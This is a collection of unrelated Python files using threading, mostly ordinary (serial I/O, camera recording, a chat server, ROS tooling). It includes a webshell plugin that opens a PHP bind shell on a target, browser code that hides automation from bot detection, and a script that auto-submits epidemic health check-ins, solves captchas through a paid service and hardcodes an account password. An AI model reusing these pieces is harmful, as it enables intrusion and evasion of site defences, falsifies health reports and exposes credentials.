porttimeout=timeout*10
baud=int(self.param['baud'])
maxerrors=int(self.param['numerrors'])
filterstr=self.param.get('filter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
self.device=self.openDevice(baud,init)
init=False
if self.doStop:
AVNLog.info("handler stopped, leaving")
self.setInfoWithKey("writer","stopped",AVNWorker.Status.INACTIVE)
try:
self.device.close()
self.device=None
except:
pass
return
if self.device is None:
time.sleep(porttimeout/2)
continue
AVNLog.debug("%s opened, start sending data",self.device.name)
lastTime=time.time()
numerrors=0
seq=0
while True and not self.doStop:
bytes=0
try:
seq,data=self.feeder.fetchFromHistory(seq,10,includeSource=True,nmeafilter=filter)
if len(data)>0:
for line in data:
if line.source in self.blackList:
AVNLog.debug("ignore %s:%s due to blacklist",line.source,line.data)
else:
self.writeLine(self.device,line.data)
except Exception as e:
AVNLog.debug("Exception %s in serial write, close and reopen %s",traceback.format_exc(),portname)
try:
self.device.close()
self.device=None
isOpen=False
seq=0
except:
pass
break
AVNLog.info("stopping handler")
self.setInfoWithKey("writer","stopped",AVNWorker.Status.INACTIVE)
self.deleteInfo()
#the read method for the combined reader/writer
def readMethod(self):
threading.current_thread().setName("[%s]%s-combinedReader"%(AVNLog.getThreadId(),self.getName()))
self.setInfoWithKey("reader","started",AVNWorker.Status.STARTED)
AVNLog.info("started")
filterstr=self.param.get('readFilter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
hasNmea=False
source=self.sourceName
while True and not self.doStop:
try:
if self.device is not None:
bytes=self.device.readline(300)
if self.doStop:
AVNLog.info("Stopping reader of combined reader/writer %s",unicode(self.param['port']))
self.deleteInfoWithKey("reader")
return
if bytes is None or len(bytes)==0:
#if there is no data at all we simply take all the time we have...
AVNLog.debug("unable to read data, retrying ")
time.sleep(0.1)
continue
data=bytes.decode('ascii','ignore')
if len(data) < 5:
AVNLog.debug("ignore short data %s",data)
else:
if not NMEAParser.checkFilter(data,filter):
AVNLog.debug("ignore line %s due to not matching filter",data)
continue
if not hasNmea:
self.setInfoWithKey("reader","receiving data",AVNWorker.Status.NMEA)
if not self.writeData is None:
self.writeData(data,source)
else:
AVNLog.debug("unable to write data")
else:
time.sleep(0.5)
except:
AVNLog.debug("exception on read in mixed reader/writer %s (port %s)",traceback.format_exc(),unicode(self.param['port']))
time.sleep(0.5)
hasNmea=False
def setInfo(self,txt,status):
if not self.infoHandler is None:
self.infoHandler.setInfo(self.getName(),txt,status)
def deleteInfo(self):
if not self.infoHandler is None:
self.infoHandler.deleteInfo(self.getName())
def setInfoWithKey(self,key,txt,status):
if not self.infoHandler is None:
self.infoHandler.setInfo(self.getName()+"-"+key,txt,status)
def deleteInfoWithKey(self,key):
if not self.infoHandler is None:
self.infoHandler.deleteInfo(self.getName()+"-"+key)
#a Worker to directly write to a serial line using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#if no data is received within timeout *10 the port is closed and reopened
#this gives the chance to handle dynamically assigned ports with no issues
class AVNSerialWriter(AVNWorker):
@classmethod
def getConfigName(cls):
return "AVNSerialWriter"
@classmethod
def getConfigParam(cls,child):
if not child is None:
return None
cfg=SerialWriter.getConfigParam()
rt=cfg.copy()
return rt
@classmethod
def createInstance(cls, cfgparam):
if not hasSerial:
AVNLog.warn("serial writers configured but serial module not available, ignore them")
return None
rt=AVNSerialWriter(cfgparam)
return rt
def __init__(self,param):
for p in ('port','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
AVNWorker.__init__(self, param)
#thread run method - just try forever
def run(self):
self.setName(self.getThreadPrefix())
writer=SerialWriter(self.param,self.writeData,self,self.getSourceName(self.getParamValue('port')))
writer.run()
avnav_handlerList.registerHandler(AVNSerialWriter)
|
recording_video_with_opencv_multithreading.py
|
from threading import Thread
import cv2
import time
class VideoWriterWidget(object):
def __init__(self, video_file_name, src=0):
# Create a VideoCapture object
self.frame_name = str(src)
self.video_file = video_file_name
self.video_file_name = video_file_name + '.avi'
self.capture = cv2.VideoCapture(src)
# Default resolutions of the frame are obtained (system dependent)
self.frame_width = int(self.capture.get(3))
self.frame_height = int(self.capture.get(4))
# Set up codec and output video settings
self.codec = cv2.VideoWriter_fourcc('M','J','P','G')
self.output_video = cv2.VideoWriter(self.video_file_name, self.codec, 30, (self.frame_width, self.frame_height))
# Start the thread to read frames from the video stream
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
# Start another thread to show/save frames
self.start_recording()
print('initialized {}'.format(self.video_file))
def update(self):
# Read the next frame from the stream in a different thread
while True:
if self.capture.isOpened():
(self.status, self.frame) = self.capture.read()
def show_frame(self):
# Display frames in main program
if self.status:
cv2.imshow(self.frame_name, self.frame)
# Press Q on keyboard to stop recording
key = cv2.waitKey(1)
if key == ord('q'):
self.capture.release()
self.output_video.release()
cv2.destroyAllWindows()
exit(1)
def save_frame(self):
# Save obtained frame into video output file
self.output_video.write(self.frame)
def start_recording(self):
# Create another thread to show/save frames
def start_recording_thread():
while True:
try:
self.show_frame()
self.save_frame()
except AttributeError:
pass
self.recording_thread = Thread(target=start_recording_thread, args=())
self.recording_thread.daemon = True
self.recording_thread.start()
if __name__ == '__main__':
src1 = 'Your link1'
video_writer_widget1 = VideoWriterWidget('Camera 1', src1)
src2 = 'Your link2'
video_writer_widget2 = VideoWriterWidget('Camera 2', src2)
src3 = 'Your link3'
video_writer_widget3 = VideoWriterWidget('Camera 3', src3)
# Since each video player is in its own thread, we need to keep the main thread alive.
# Keep spinning using time.sleep() so the background threads keep running
# Threads are set to daemon=True so they will automatically die
# when the main thread dies
while True:
time.sleep(5)
|
bindshell.py
|
from libs.config import alias, color
from libs.myapp import send
from libs.functions.webshell_plugins.bindshell import *
from threading import Thread
from time import sleep
@alias(True, func_alias="bs", _type="SHELL")
def run(port: int = 7777, passwd: str = "doughnuts"):
"""
bind shell
Bind a port and wait for someone to connect to get a shell.
eg: bindshell {port=7777} {passwd=doughnuts}
"""
t = Thread(target=send, args=(get_php_binshell(str(port), passwd), ))
t.setDaemon(True)
t.start()
sleep(1)
if (t.is_alive()):
print(f"\nBind {port} {color.green('success')}. Password is {color.green(passwd)}\n")
else:
print(f"\nBind {port} {color.red('error')}\n")
|
utils.py
|
from colorama import init, Fore, Back, Style
from datetime import datetime
from selenium.webdriver import Chrome, ChromeOptions
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from webhook import DiscordWebhook, DiscordEmbed
from chromedriver_py import binary_path as driver_path
import json, platform, darkdetect, random, settings, threading
if platform.system == "Windows":
init(convert=True)
normal_color = Fore.WHITE
else:
init()
normal_color = Fore.WHITE if darkdetect.isDark() else Fore.BLACK
print(normal_color + "Welcome To Bird Bot")
class BirdLogger:
def ts(self):
return str(datetime.now())[:-7]
def normal(self,task_id,msg):
print(normal_color + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def alt(self,task_id,msg):
print(Fore.MAGENTA + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def error(self,task_id,msg):
print(Fore.RED + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def success(self,task_id,msg):
print(Fore.GREEN + "[{}][TASK {}] {}".format(self.ts(),task_id,msg))
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def get_profile(profile_name):
profiles = return_data("./data/profiles.json")
for p in profiles:
if p["profile_name"] == profile_name:
return p
return None
def get_proxy(list_name):
if list_name == "Proxy List" or list_name == "None":
return False
proxies = return_data("./data/proxies.json")
for proxy_list in proxies:
if proxy_list["list_name"] == list_name:
return format_proxy(random.choice(proxy_list["proxies"].splitlines()))
return None
def format_proxy(proxy):
try:
proxy_parts = proxy.split(":")
ip, port, user, passw = proxy_parts[0], proxy_parts[1], proxy_parts[2], proxy_parts[3]
return {
"http": "http://{}:{}@{}:{}".format(user, passw, ip, port),
"https": "https://{}:{}@{}:{}".format(user, passw, ip, port)
}
except IndexError:
return {"http": "http://" + proxy, "https": "https://" + proxy}
def send_webhook(webhook_type,site,profile,task_id,image_url):
if settings.webhook !="":
webhook = DiscordWebhook(url=settings.webhook, username="Bird Bot", avatar_url="https://i.imgur.com/fy26LbM.png")
if webhook_type == "OP":
if not settings.webhook_on_order:
return
embed = DiscordEmbed(title="Order Placed",color=0x34c693)
elif webhook_type == "B":
if not settings.webhook_on_browser:
return
embed = DiscordEmbed(title="Complete Order in Browser",color=0xf2a689)
elif webhook_type == "PF":
if not settings.webhook_on_failed:
return
embed = DiscordEmbed(title="Payment Failed",color=0xfc5151)
embed.set_footer(text="Via Bird Bot",icon_url="https://i.imgur.com/fy26LbM.png")
embed.add_embed_field(name="Site", value=site,inline=True)
embed.add_embed_field(name="Profile", value=profile,inline=True)
embed.add_embed_field(name="Task ID", value=task_id,inline=True)
embed.set_thumbnail(url=image_url)
webhook.add_embed(embed)
try:
webhook.execute()
except:
pass
def open_browser(link,cookies):
threading.Thread(target = start_browser, args=(link,cookies)).start()
def start_browser(link,cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
try:
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie.name,
"value" : cookie.value,
"domain" : cookie.domain
})
driver.get(link)
except:
pass
|
server.py
|
import socket
import sys
from threading import *
import time
import traceback
import logging
from logging.handlers import RotatingFileHandler
import os
# create logger
logger = logging.getLogger('WIZARD-CHAT')
logger.setLevel(logging.DEBUG)
log_file = os.path.join('{}/Documents/wizard/log/'.format(os.getenv("USERPROFILE")), "wizard_chat.log")
if not os.path.isdir(os.path.dirname(log_file)):
os.makedirs(os.path.dirname(log_file))
# create file handler and set level to debug
file_handler = RotatingFileHandler(log_file, mode='a', maxBytes=1000000, backupCount=1000, encoding=None, delay=False)
# create console handler and set level to debug
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to handlers
stream_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
# add handlers to logger
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
logger.info("Python : " + str(sys.version))
class server(Thread):
def __init__(self):
super(server, self).__init__()
hostname = socket.gethostname()
## getting the IP address using socket.gethostbyname() method
ip_address = socket.gethostbyname(hostname)
port = 5034
logger.info("Starting chat server on : '" + str(ip_address) + "'")
logger.info("Default port : '" + str(port) + "'")
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((ip_address, port))
self.server.listen(100)
logger.info("Chat server started")
self.list_of_clients = []
def run(self):
while True:
try:
conn, addr = self.server.accept()
conn_id = [conn, time.time()]
self.list_of_clients.append([conn, time.time()])
Thread(target=self.clientThread, args=(conn_id, addr)).start()
time.sleep(0.05)
logger.info("New client : "+str(conn_id) + str(addr))
except:
logger.error(str(traceback.format_exc()))
continue
def clientThread(self, conn, addr):
try_count = 0
while try_count<3:
try:
message = conn[0].recv(2048)
if message:
self.broadcast(message, conn)
time.sleep(0.1)
else:
self.remove(conn)
break
except ConnectionResetError:
try_count+=1
logger.info("Removing client : " + str(conn))
self.remove(conn)
break
except ConnectionAbortedError:
try_count+=1
logger.info("Removing client : " + str(conn))
self.remove(conn)
break
except:
try_count+=1
logger.error(str(traceback.format_exc()))
continue
def broadcast(self, message, conn):
logger.debug("Broadcasting : " + str(message))
for client in self.list_of_clients:
try:
client[0].send(message)
except:
client[0].close()
self.remove(client)
def remove(self, connection):
if connection in self.list_of_clients:
self.list_of_clients.remove(connection)
logger.info('Removing client : ' + str(connection))
if __name__ == "__main__":
try:
server = server()
server.daemon = True
server.start()
print('Press Ctrl+C to quit...')
while 1:time.sleep(1)
except KeyboardInterrupt:
print('Stopping server...')
raise SystemExit
sys.exit()
|
demo6.py
|
"""
【Python多任务编程】父子进程数据共享问题 2019/11/02 14:50
"""
# TODO: 进程间数据不共享
"""
在一个程序中,如果创建了一个子进程,那么这个子进程会拷贝一份当前进程所有的资源作为子进程的运行环境。
也就是说,子进程中的变量可能跟父进程一样,但其实是另外一个块内存区域了。他们之间的数据是不共享的。
所有资源:变量,函数,class 类等
"""
from multiprocessing import Process
AGE = 1
def greet(names):
global AGE
AGE += 1
names.append('ketang')
print('=====子进程=====')
print('AGE的值:%d,id为:%s' % (AGE, id(AGE)))
print('names:%s' % (names,))
print('=====子进程结束=====')
if __name__ == '__main__':
names = ['zhiliao']
# greet(names)
p = Process(target=greet, args=(names,))
p.start()
p.join()
print('=====主进程=====')
print('AGE的值:%d,id为:%s' % (AGE, id(AGE)))
print('names:%s' % (names,))
print('=====主进程结束=====')
|
main.py
|
# !!!注意!!!
# 本项目(yibanAutocheakin)涉及的任何代码,仅供学习测试研究,禁止用于商业用途
# !!!!!!!!!!!!!!!!!!!!特别注意!!!!!!!!!!!!!!!!!!!!
# 如果出现发热、干咳、体寒、体不适、胸痛、鼻塞、流鼻涕、恶心、腹泻等症状。
# 请立即停止使用本项目(yibanAutocheakin),认真实履行社会义务,及时进行健康申报。
# !!!!!!!!!!!!!!!!!!!!特别注意!!!!!!!!!!!!!!!!!!!!
# 如有侵权,请提供相关证明,所有权证明,本人收到后删除相关文件。
# 无论以任何方式查看、复制或使用到本项目(yibanAutocheakin)中的任何脚本,都应该仔细阅读此声明。本人保留随时更改或补充的此免责声明的权利。
# 一旦使用并复制了本项目(yibanAutocheakin)的任何相关脚本,则默认视为您已经接受了此免责声明。
# 使用并复制了本项目(yibanAutocheakin)的任何相关脚本或本人制作的任何脚本,则默认视为您已经接受了此免责声明。请仔细阅读
# 运行要求:python3.6.4 , requests库
# 使用方法————修改完成且正确后可选择:服务器shell脚本执行.py文件、Windows计划任务执行.py文件、每日手动执行
# 建议凌晨00:00开始执行
# 功能说明————自动进行易班打卡签到,签到间隔可由jiange()函数中的内容控制
# !!!注意!!!
# 本代码中的每一处注释都有非常重要的意义,按注释操作绝对可以正常使用(截至2022年1月11日)
# !!!注意!!!
import requests # request库需另外安装,安装方法建议百度,不再赘述
import os
import json
import time
from threading import Thread
def jiange():
time.sleep(10800) # ()中的是签到成功后再次签到所间隔的秒数
class KSClient(object):
# 经开发者测试,由于签到需要验证码,而验证码的识别难度又非常高,一般的图像处理后识别的方法很难实现正确读取
# 为此开发者甚至通过卷积神经网络运算,跑了10万张验证码,训练了识别模型,可成功率依然有限
# 故借用识别平台,该平台每天有20次免费识别机会,个人使用绰绰有余
# 平台地址———— http://fast.net885.com/ 点左下角立即注册,注册完成后在下边各处填入用户名和密码,平台很便宜
# !!!在签到主函数中也有一处用户名和密码,千万别忘记填!!!
# !!!!!!!!!这不是识别平台的广告!!!!!!!!!!!
def __init__(self):
self.username = 'username' # ''中填用户名
self.Token = '' # 不管
self.headers = {
'Connection': 'Keep-Alive',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
}
# 获取taken
def GetTaken(self, username, password): # (self,用户名,密码)依次填入用户名和密码
brtn = False
r = requests.get('http://api.95man.com:8888/api/Http/UserTaken?user=' + username + '&pwd=' + password + '&isref=0',
headers=self.headers) # 第一个加号后填用户名,第三个加号后填密码
arrstr = r.text.split('|')
if (arrstr[0] == '1'):
self.username = username # 等号后填用户名
self.Token = arrstr[1]
brtn = True
return brtn
# 识别图片
def PostPic(self, filepath, codetype):
"""
imbyte: 图片字节
imgtype: 类型 1为通用类型 更多精准类型请参考 http://fast.net885.com/auth/main.html
"""
strRtn = ''
imbyte = open(filepath, 'rb').read()
filename = os.path.basename(filepath)
files = {'imgfile': (filename, imbyte)}
r = requests.post(
'http://api.95man.com:8888/api/Http/Recog?Taken=' + self.Token + '&imgtype=' + str(codetype) + '&len=0',
files=files, headers=self.headers)
arrstr = r.text.split('|')
# 返回格式:识别ID|识别结果|用户余额
if (int(arrstr[0]) > 0):
strRtn = arrstr[1]
return strRtn
def qiandao(hbnd, hbndt): # 主签到函数
global wdnmd
s = requests.Session()
Ks95man = KSClient()
code = None
web = "http://211.68.191.30/epidemic/index?token=%s" % (hbnd)
r = s.get(web)
r = s.get("http://211.68.191.30/epidemic/captcha")
with open("1.png", "wb+") as f:
f.write(r.content)
f.close()
if Ks95man.GetTaken('username', 'password'): # 按(用户名,密码)的格式依次填入
code = Ks95man.PostPic('1.png', 1)
sign_content = hbndt
dat = {"data": sign_content, "captcha": code}
r = s.post("http://211.68.191.30/epidemic/student/sign", data=dat)
text = json.loads(r.text)
print(text)
try:
nmd = text["code"]
except:
rnm = text["status"]
if (rnm) == 500:
cnm = 0
while (cnm) < 10:
print(cnm)
chongshi(hbnd, hbndt)
if (wdnmd) == 1:
jiange()
qiandao(hbnd, hbndt)
else:
cnm = cnm + 1
time.sleep(5)
else:
print("签到失败")
tongzhi("签到失败") # 调用通知函数,并发送()中的内容
else:
print(nmd)
if (nmd) == -1:
time.sleep(1)
qiandao(hbnd, hbndt)
else:
jiange()
qiandao(hbnd, hbndt)
def chongshi(hbnd, hbndt): # 失败重试函数
global wdnmd
s = requests.Session()
Ks95man = KSClient()
code = None
web = "http://211.68.191.30/epidemic/index?token=%s" % (hbnd)
r = s.get(web)
r = s.get("http://211.68.191.30/epidemic/captcha")
with open("1.png", "wb+") as f:
f.write(r.content)
f.close()
if Ks95man.GetTaken('zwxym', 'zhao0427'):
code = Ks95man.PostPic('1.png', 1)
sign_content = hbndt
dat = {"data": sign_content, "captcha": code}
r = s.post("http://211.68.191.30/epidemic/student/sign", data=dat)
text = json.loads(r.text)
try:
nmd = text["code"]
except:
wdnmd = 0
else:
wdnmd = 1
def tongzhi(text): # 通知函数
key = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" # 百度搜”server酱“用微信扫码登录后获取一个key,粘贴到这里
url = "https://sctapi.ftqq.com/%s.send" % (key)
title = u"通知" # 通知标题,可自定义
content = text # 通知内容修改qiandao()函数中,130行tongzhi()括号中的内容即可
data = {"text": title, "desp": content}
requests.post(url, data)
def main():
global nmd
global code
global rnm
global cnm
global wdnmd
global hbnd
global hbndt
global xxx # 这个变量名可以自己换
xxx = "" # 此处填写的是你的 token
# 获取方法
# 你的签到token,获取方法:进入“易办大厅”点右上角三点,再点复制链接,将链接发送到电脑,复制到chrome浏览器打开
# 右击页面,点击检查,点击右侧区域上边一排选项中的“网络”,再在左侧页面中点击“疫情放控签到”
# 此时左侧会出现一些网址,当中的第一个是一个包含了token的链接,复制链接,留下“token=“后变的内容
# 并将该内容粘贴于上方双引号中,完成token配置
# !!!注意!!!
# token不是一成不变的,会不定时重置,本程序还不能实现自动跟随重置
# 故当收到server酱通知时,请首先检查token是否发生更改
# 方法是——登录对应账号的,查看进入易办大厅时,查看是否需要重新授权,如需要,请重复上述获取token的操作
# 如您有一定的渗透基础,有抓包经验,麻烦您将授权过程的抓包结果发送至 learnzhao@yzui.onmicrosoft.com ,帮助开发者完成易班第三方网站verify_request的获取
# 如您没有基础,麻烦您在授权页面右上角点击复制链接,并将此链接发送至 learnzhao@yzui.onmicrosoft.com ,帮助开发者完成易班第三方网站verify_request的获取
# !谢谢各位的支持!
xxxt = '''{
"realName":"你的名字————例:”大猛子“",
"collegeName":"你的学院全称————例:”城乡建设学院“",
"className":"你的专业全程和班级如————例:”土木工程1701“",
"studentId":"你的学号————例”没有例“",
"answer":
"{
\\"q1\\":\\"是\\",
\\"q2\\":\\"是\\",
\\"q3\\":\\"是\\",
\\"q4\\":\\"是\\",
\\"q4_1\\":\\"\\",
\\"q5\\":\\"是\\",
\\"q6\\":\\"是\\",
\\"q6_1\\":\\"\\",
\\"position\\":\\"你的地址\\ "
}"
}'''
# !!!注意!!!
# 上边四项需要根据签到者的实际信息来填写,一定要填写在" "之间,删掉例子,在" "中间填写。
# answer中的内容只要签到页面不改,就不会失效,需要注意的是最后的地址,删掉”你的地址“,在"后填写你的住址
# 如果签到内容发生变化,可参照获取token的那个办法,复制易办大厅的地址后,进入”疫情防控签到页面“,再点击签到按键,进入签到页面,再右击检查
# 自行查看源码中的各个”q“(问题)是否发生变化,根据网页内容,参照现有程序,增加或修改answer中的内容
# 一般出问题都是签到增加了问题,就在位置行上变,仿照上文自行插入内容
# 本开发者承诺本开源代码没有任何”后门“来获取同学们的个人信息
# -------------------------------------------------------------------------------------------------------------------
# !!!注意!!!
# 本开源程序采用”极为先进“的多线程方式,可并行运行多个任务,添加方式如下
# 将第二个人的token填如下方”yyy“的""中
# global yyy
# yyy = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# 将第二个人的信息与地址填到下方的”yyyt“中,地址在最后,第三个人的依次类推,切记要先定义全局变量——global xxx
# global yyyt
# yyyt = '''{"realName":"xx","collegeName":"xxxxxx","className":"xxxxxxxxx","studentId":"xxxxxxxxxxxxx","answer":"{\\"q1\\":\\"是\\",\\"q2\\":\\"是\\",\\"q3\\":\\"是\\",\\"q4\\":\\"是\\",\\"q4_1\\":\\"\\",\\"q5\\":\\"是\\",\\"q6\\":\\"是\\",\\"q6_1\\":\\"\\",\\"position\\":\\"xxxxxxxxxx\\"}"}'''
# global zzz
# zzz = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# global zzzt
# zzzt = '''{"realName":"xx","collegeName":"xxxxxxx","className":"xxxxxxxxx","studentId":"xxxxxxxxxxxxx","answer":"{\\"q1\\":\\"是\\",\\"q2\\":\\"是\\",\\"q3\\":\\"是\\",\\"q4\\":\\"是\\",\\"q4_1\\":\\"\\",\\"q5\\":\\"是\\",\\"q6\\":\\"是\\",\\"q6_1\\":\\"\\",\\"position\\":\\"xxxxxxxxx\\"}"}'''
# ......
t1 = Thread(target=qiandao, args=(xxx, xxxt,)) # 定义线程t1,线程任务为调用qiandao()函数,参数是xxx和xxxt,进行第一个人的签到
# t2 = Thread(target=qiandao, args=(yyy,yyyt,)) # 定义线程t2,线程任务为调用qiandao()函数,进行第二个人的签到
# t3 = Thread(target=qiandao, args=(zzz,zzzt,)) #定义线程t3,线程任务为调用qiandao()函数,进行第三个人的签到
# ......
t1.start() # 开始运行t1线程,要签那个人的就运行那个线程
# t2.start()
# t3.start()
# ......
if __name__ == "__main__": #入口函数
main()
|
AsyncSave.py
|
import datetime
import threading
import time
import os
import cv2
def TimeStamp(mode='msec'):
ts = time.time()
if mode == 'msec-raw':
return str(int(time.time()*1000))
if mode == 'msec':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H-%M-%S.%f')
if mode == 'minute':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H-%M')
if mode == 'hour':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d.%H')
if mode == 'day':
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')
def mkdirMaybe(recordDir):
if not os.path.exists(recordDir):
os.makedirs(recordDir)
print('New directory: %40s' % recordDir)
class AsyncSaver(threading.Thread):
def __init__(self, camID, rootPath):
self.camID = camID
self.recordDir = os.path.join(rootPath, 'camdir-%d' % camID)
mkdirMaybe(self.recordDir)
def save(self, bgrImg, bb=None):
currTS = TimeStamp(mode='msec-raw')
if bb is None:
filename = currTS + '.jpg'
else:
filename = '%s-%d-%d-%d-%d.jpg' % (currTS, bb.left(), bb.top(), bb.right(), bb.bottom())
dayDir = os.path.join(self.recordDir, TimeStamp(mode='day'))
hourDir = os.path.join(dayDir, TimeStamp(mode='hour'))
minuteDir = os.path.join(hourDir, TimeStamp(mode='minute'))
mkdirMaybe(minuteDir)
path = os.path.join(minuteDir, filename)
threading.Thread(target=cv2.imwrite, args=(path, bgrImg)).start()
|
__init__.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function, unicode_literals
import argparse
import os
import roslib.network
import rospy
import socket
import sys
import threading
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon import host as nmdhost
from fkie_node_manager_daemon.version import detect_version
from .common import get_ros_home
from .history import History
from .name_resolution import NameResolution
from fkie_node_manager.nmd_client import NmdClient
from fkie_node_manager.nmd_client.launch_channel import BinarySelectionRequest, LaunchArgsSelectionRequest
from .progress_queue import InteractionNeededError
from .screen_handler import ScreenHandler, ScreenSelectionRequest, NoScreenOpenLogRequest
from .settings import Settings
from .ssh_handler import SSHhandler, AuthenticationRequest
from .start_handler import StartException
from .start_handler import StartHandler
PKG_NAME = 'fkie_node_manager'
__author__ = "Alexander Tiderko (Alexander.Tiderko@fkie.fraunhofer.de)"
__copyright__ = "Copyright (c) 2012 Alexander Tiderko, Fraunhofer FKIE/CMS"
__license__ = "BSD"
__version__ = "unknown" # git describe --tags --dirty --always
__date__ = "unknown" # git log -1 --date=iso
# PYTHONVER = (2, 7, 1)
# if sys.version_info < PYTHONVER:
# print 'For full scope of operation this application requires python version > %s, current: %s' % (str(PYTHONVER), sys.version_info)
HOSTS_CACHE = dict()
'''
the cache directory to store the results of tests for local hosts.
:see: :meth:`is_local`
'''
_LOCK = threading.RLock()
_MAIN_FORM = None
_SETTINGS = None
_NMD_CLIENT = None
_SSH_HANDLER = None
_SCREEN_HANDLER = None
_START_HANDLER = None
_NAME_RESOLUTION = None
_HISTORY = None
_QAPP = None
def settings():
'''
:return: The global settings
:rtype: :class:`fkie_node_manager.settings.Settings`
'''
return _SETTINGS
def nmd():
'''
:return: Node manager daemon client
:rtype: :class:`fkie_node_manager.settings.NmdClient`
'''
return _NMD_CLIENT
def ssh():
'''
:return: The SSH handler to handle the SSH connections
:rtype: :class:`fkie_node_manager.settings.SSHhandler`
'''
return _SSH_HANDLER
def screen():
'''
:return: The screen handler to the screens.
:rtype: :class:`fkie_node_manager.ScreenHandler`
:see: http://linuxwiki.de/screen
'''
return _SCREEN_HANDLER
def starter():
'''
:return: The start handler to handle the start of new ROS nodes on local or remote machines.
:rtype: :class:`fkie_node_manager.settings.StartHandler`
'''
return _START_HANDLER
def nameres():
'''
:return: The name resolution object translate the the name to the host or ROS master URI.
:rtype: :class:`fkie_node_manager.settings.NameResolution`
'''
return _NAME_RESOLUTION
def history():
'''
:return: The history of entered parameter.
:rtype: :class:`fkie_node_manager.settings.History`
'''
return _HISTORY
def is_local(hostname, wait=False):
'''
Test whether the given host name is the name of the local host or not.
:param str hostname: the name or IP of the host
:return: True if the hostname is local or None
:rtype: bool
:raise Exception: on errors while resolving host
'''
if hostname is None:
return True
with _LOCK:
if hostname in HOSTS_CACHE:
if isinstance(HOSTS_CACHE[hostname], threading.Thread):
return False
return HOSTS_CACHE[hostname]
try:
socket.inet_aton(hostname)
local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = hostname.startswith('127.') or hostname in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
except socket.error:
# the hostname must be resolved => do it in a thread
if wait:
result = __is_local(hostname)
return result
else:
thread = threading.Thread(target=__is_local, args=((hostname,)))
thread.daemon = True
with _LOCK:
HOSTS_CACHE[hostname] = thread
thread.start()
return False
def __is_local(hostname):
'''
Test the hostname whether it is local or not. Uses socket.gethostbyname().
'''
try:
machine_addr = socket.gethostbyname(hostname)
except socket.gaierror:
with _LOCK:
HOSTS_CACHE[hostname] = False
return False
local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = machine_addr.startswith('127.') or machine_addr in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
def finish(*arg):
'''
Callback called on exit of the ros node.
'''
# close all ssh sessions
if _SSH_HANDLER is not None:
_SSH_HANDLER.close()
# save the launch history
